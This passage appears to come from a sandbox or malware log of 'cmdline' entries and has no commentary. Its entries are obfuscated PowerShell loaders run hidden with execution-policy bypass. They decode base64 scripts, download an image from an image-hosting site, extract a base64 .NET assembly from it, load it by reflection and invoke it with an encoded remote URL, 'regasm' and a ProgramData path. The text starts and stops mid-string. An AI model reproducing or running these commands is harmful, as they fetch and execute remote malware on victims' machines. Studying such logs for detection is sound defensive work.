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BbvHbRIwOEMvHbRIwOavHbRIwOBhvHbRIwOHIvHbRIwOXQvHbRIwOzvHbRIwODYvHbRIwOIvHbRIwOvHbRIwOgvHbRIwOC0vHbRIwOcgBlvHbRIwOFvHbRIwOvHbRIwObvHbRIwOBhvHbRIwOGMvHbRIwOZQvHbRIwOnvHbRIwOG0vHbRIwOSwvHbRIwOzvHbRIwOCcvHbRIwOLvHbRIwOBbvHbRIwOEMvHbRIwOavHbRIwOBhvHbRIwOHIvHbRIwOXQvHbRIwO5vHbRIwODIvHbRIwOKQvHbRIwOgvHbRIwOHwvHbRIwOIvHbRIwOvHbRIwOuvHbRIwOCvHbRIwOvHbRIwOKvHbRIwOvHbRIwOgvHbRIwOCQvHbRIwORQBuvHbRIwOFYvHbRIwOOgBDvHbRIwOG8vHbRIwOTQBzvHbRIwOFvHbRIwOvHbRIwOZQBDvHbRIwOFsvHbRIwONvHbRIwOvHbRIwOsvHbRIwODIvHbRIwONvHbRIwOvHbRIwOsvHbRIwODIvHbRIwONQBdvHbRIwOC0vHbRIwOagBPvHbRIwOGkvHbRIwOTgvHbRIwOnvHbRIwOCcvHbRIwOKQvHbRIwO=';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('vHbRIwO','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD" |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('bu0imageUrl = Ok0https://uploaddei'+'magen'+'s.com.br/ima'+'ges/004/683/779/original/download.jpg?1701878864Ok0;bu0webClient = New-Object System.Net.WebClient;bu0imageBytes = bu0webCl'+'ient.DownloadData(bu0imageUrl);bu0imageText = [Sy'+'stem.Text.Encoding]::UTF8.GetString(bu0imageBytes);bu0startFlag = Ok0<<BASE64_START>>Ok0;bu0endFl'+'ag = Ok0<<BASE64_END>>Ok0;bu0startIndex = bu0imageText.IndexOf(bu0startFlag);bu0endIndex = '+'bu0imageText.IndexOf(bu0endF'+'lag);bu0sta'+'rtIndex -ge 0 -and bu0endIndex -gt bu0startIn'+'dex;bu0startIndex += bu0startFlag.Length;bu0base64Length = bu0endIndex - bu0startIndex;bu0base64Command = bu0imageText.S'+'ubstring(bu0sta'+'rtIndex, bu0'+'base64Length);bu0co'+'mmandBytes = [System.Convert]::FromBase64String'+'(bu0base64Command);bu0loadedAssembly = [Syst'+'em.Reflection.Assembly]::Load(bu0commandBytes);bu0type = bu0loadedAssembly.GetType(Ok0ClassL'+'ibrary3.Class1Ok0);bu0method = bu0type.GetMetho'+'d(Ok0RunOk0).Invoke(bu0null, [object[]] (Ok0dH'+'h0'+'Lk1HWi8wMDMvOC4zNC44MjIuNjYvLzpwdHRoOk0 , Ok0Ok0 , Ok02Ok0 , Ok0regas'+'mOk0 , Ok06Ok0 , Ok0C:mK3ProgramDatamK3Ok0, Ok0htmljiOk0))') -rePlace'Ok0',[Char]39-CRePlacE 'bu0',[Char]36 -rePlace'mK3',[Char]92) | . ( $EnV:CoMsPeC[4,24,25]-jOiN'')" |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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